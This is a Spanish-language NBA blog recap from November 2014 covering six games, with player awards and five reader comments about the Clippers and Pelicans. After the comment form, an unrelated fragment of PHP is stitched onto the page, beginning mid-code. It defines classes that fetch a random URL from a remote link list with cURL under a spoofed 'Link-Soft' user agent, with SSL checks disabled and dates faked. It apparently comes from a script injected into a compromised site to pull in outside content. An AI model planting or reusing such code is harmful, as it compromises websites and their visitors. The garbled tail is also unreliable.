La crónica: Magníficos mecanismos imperfectos

04 de November de 2014 por MagicJohnson32

La perfección en el deporte es aburrida, salvo en los rarísimos casos en que alcanza la excelencia. Hay mucho más disfrute en aquellos equipos que abrazan sus imperfecciones y las utilizan como armas arrojadizas contra sus rivales. El ejemplo más meridiano que presenta la NBA en los últimos años son los Grizzlies, aupados a lo más alto del Oeste pese a ser el equipo menos anotador de la conferencia después de frenar anoche a Anthony Davis y sus Pelicans. Otro caso de mecanismo obviamente imperfecto que está ofreciendo un magnífico rendimiento, éste inesperado y por ello mucho más grato, son los Sacramento Kings, que después de ganar a los Clippers el domingo despacharon su temible back-to-back con una victoria en la siempre incómoda cancha de los Nuggets. También vencieron los invictos Rockets en Philadelphia, así como los Mavs, Nets y Clippers.

Repasamos la jornada.

collison

PELICANS 81 – GRIZZLIES 93

Los Grizzlies tienen una habilidad inigualable para llevar los partidos a su terreno, uno de trincheras y barro, donde frecuentemente sangre, sudor y lágrimas pueden más que el talento. Que se lo digan a los Pelicans, desactivados en todos sus frentes durante su visita al FedEx Forum, incapaces de anotar más de un tercio de sus tiros y de imponerse en siquiera un cuarto. No hubo nada extraordinario anoche en los Grizzlies, pero es que nunca lo hay. Gasol hizo su parte, Zach cumplió con la suya, y los actores de reparto remataron una faena fundamentada, claro está, en la defensa. Anthony Davis pareció un jugador común casi toda la noche, Asik y Ryan Anderson sumaron un 3 de 21 en tiros, y solo Tyreke Evans pudo mantener la buena línea en la que ha empezado el año. Si algo se salió del guion fue la irrupción de Taysh Prince, como regresado de entre los muertos, para anotar 14 puntos.

KINGS 110 – NUGGETS 105

Algo ha cambiado en los Kings. Es posible que el balance de 3-1 con el que han empezado la temporada no sea más que un espejismo, que pierdan los 78 partidos restantes, pero hay algo diferente en ellos. Es un tema de química interna y de compostura, de confianza en uno mismo y en el compañero. Los Kings no juegan muy diferente a como lo venían haciendo en años anteriores. Siguen siendo ese grupo disfuncional encabezado por dos de los jugadores más disfuncionales de la liga como son Cousins y Gay. Sin embargo, este año, los Kings creen en sí mismos. Solo así se explican las tres victorias cosechadas hasta el momento, ante Blazers, Clippers y, anoche, en Denver. Así se explica que, en la segunda noche de un durísimo back-to-back, Sacramento sobreviviese un mal arranque de partido en el que les costó adaptarse a las dobles y triples defensas que Brian Shaw ordenó sobre Cousins. Así se explica que, en un partido tan alejado de lo que en teoría es terreno propicio, con actuaciones discretas de su dúo estelar, los Kings saliesen del Pepsi Center con la victoria gracias a su resistencia mental y a un 12/13 en tiros libres en el último cuarto. Bienvenidos sean los nuevos Kings; ahora, a ver cuánto duran.

ROCKETS 104 – SIXERS 93

También con 4-0, igualados con los Grizzlies en la cabeza del Oeste, se encuentran los Rockets, ganadores anoche en Philadelphia con su habitual fórmula de triples + canastas en la pintura + tiros libres. Harden, Ariza y Howard se sobraron para apuntarse la victoria ante un equipo más interesado en otros menesteres, como por ejemplo disfrutar con el potencial mostrado por Noel.

CELTICS 113 – MAVS 118

Uno de los partidos más bonitos de la madrugada lo brindaron Celtics y Mavs. Hay que agradecer de ello a Boston, que se vio 30 puntos abajo al descanso pero no se rindió y remó para ahogarse en la orilla pero no sin dejar muchos motivos para el optimismo. Jeff Green y Avery Bradley brillaron en el intento de remontada aunque al final se impuso la pareja Nowitzki-Parsons.

THUNDER 85 – NETS 116

El regreso de Reggie Jackson para los Thunder y de Brook Lopez para los Nets fue lo más noticioso del enfrentamiento entre ambos. Ambos tuvieron buenas actuaciones, pero la aparición de Jackson no disimuló el resto de bajas de unos Thunder que no fueron rival para Brooklyn.

JAZZ 101 – CLIPPERS 107

El primer triple doble de Chris Paul como jugador de los Clippers y una nueva exhibición de Blake Griffin tras su mal partido frente a Kings acabaron doblegando a unos buenos Jazz liderados por Gordon Hayward.

PREMIOS

MVP: Chris Paul consiguió su primer triple-doble como jugador de los Clippers al acabar el partido con 13 puntos, 10 rebotes y 12 asistencias pero fue Blake Griffin el más destacado de su equipo con 31 puntos, 9 rebotes y 4 asistencias. Por su parte, James Harden sigue a lo suyo y ayer se fue a los 35 puntos, 9 rebotes y 5 asistencias.

Rookie: 2 jugadores que apuntan a especialistas defensivos en el futuro, fueron los mejores de anoche. Nerlens Noel anotó 10 puntos, repartió 5 asistencias y robó 6 balones. Su compañero KJ McDaniels anotó 14 puntos y cogió 3 rebotes.

Sorpresa: ¿Qué sería de Javale McGee con otro cerebro? Ayer, en solo 14 minutos anotó 16 puntos, cogió 4 rebotes, puso 4 tapones y aún tuvo tiempo de cometer 4 faltas sobre DeMarcus Cousins. Hiperactivo.

Decepción: Derrick Favors desapareció ante Blake Griffin. Aparte de no poder pararle en ningún momento, el jugador de los Jazz anotó sólo 6 puntos.

Esfuerzo en vano: Jeff Green y Avery Bradley lideraron la que pudo ser la campanada no ya de la jornada sino prácticamente del campeonato. Tras llegar a perder de 31, los Celtics estuvieron a punto de remontar a los Mavs gracias principalmente a los 35 puntos y 7 rebotes del primero y los 32 puntos, 8 rebotes y 3 robos del segundo.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Denise dice:
    #1

    Que mala pinta tienen estos Clippers. Todos los partidos que han jugado ante rivales mediocres, y los que ha ganado ha sido al tran-tran. Como dije en su analisis, la plantilla es cortísima, sobretodo en las alas. Hoy porque ha resurgido Reggie Bullock, pero ni Barnes y Crawford con 34 años ambos, ni Redick con su clásico historial de lesiones, van a poder soportar el peso de 100 partidos si quieren el anillo. Desde la dupla Paul-Griffin, para mi es la peor plantilla de LAC y a dia de hoy, y a este nivel dudo mucho que sean cabezas de serie en PO. El equipo necesita en febrero hacer algún traspaso (Redick) y ampliar la profundidad de la plantilla ó pillar veteranos mediante buyouts

      Citar

  2. Ruxixon dice:
    #2

    Es que ahora mismo hay dos jugadores que juegan de titulares y presentan un claro bajonazo respecto a la pasada temporada,Barnes y Redick,y si juegan es porque no hay más detrás.Si que es un debe de la gerencia no reforzar el SF,que ya el año pasado era muy mejorable respecto a lo que había pero no les echaría la culpa de que Redick,clave en el arranque de la pasada campaña,pase de un 40 % a un 25 % en su acierto en el tiro.

      Citar

  3. GreenPride dice:
    #3

    Anoche vi el Grizzlies-Pelicans. Tenia ganas de ver a este equipo de New Orleans bajo el empuje de la ceja pero la verdad es que lo que ví no me gustó nada. Seguro que mucho tuvieron que ver en ello los Grizzlies que probablemente son el equipo más áspero de la NBA. Con una defensa y un ritmo de juego que limitan mucho las cosas buenas del oponente los Pelicans estuvieron bastante perdidos durante todo el partido.
    Asik y Anderson estuvieron especialmente fallones de cara al aro lo que le puso las cosas peliagudas a un Anthony Davis que no pudo imponerse en ningún momento ante Z-Bo & Marc. Así las cosas y como los exteriores salvo Tyreke tampoco pudieron superar la defensa de los Osos, éstos se llevaron el partido de manera más o menos cómodo pero sin alardes. Bastó tres jugadores haciendo doble doble y que cada uno hiciera su trabajo para llevarse el partido.
    Esperaré a otros partidos para darle palos en serio a los Pelicans pero de momento me pareció un equipo al que le queda mucho camino para poder codearse con los grandes. Los Grizzlies como siempre dispuestos a sumar victorias y si llegan bien de salud a ser un quebradero de cabeza para cualquiera que se los cruce.

      Citar

  4. GreenPride dice:
    #4

    En cuanto a lo que habláis de Clippers yo personalmente no entiendo cómo muchas quinielas les ponen como favoritos número 1 del Oeste con una plantilla a mi modo de ver igual o peor que la del año pasado (Hawes es buena adquisición pero Farmar es claramente peor que Collison). El temporadón de Barnes el año pasado lo veo difícil de repetir y no les veo con grandes anotadores para competir al máximo ni con una defensa que compense esas posibles dificultades anotadoras. No obstante creo que estarán arriba pero yo les doy pocas opciones de triunfar en el salvaje Oeste.

      Citar

  5. jhc dice:
    #5

    comose comió Griffin anoche a Favors , por cierto la vuelta de Brook Lopez, veremos si recupera el gran nivel que mostró antes de la lesión

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>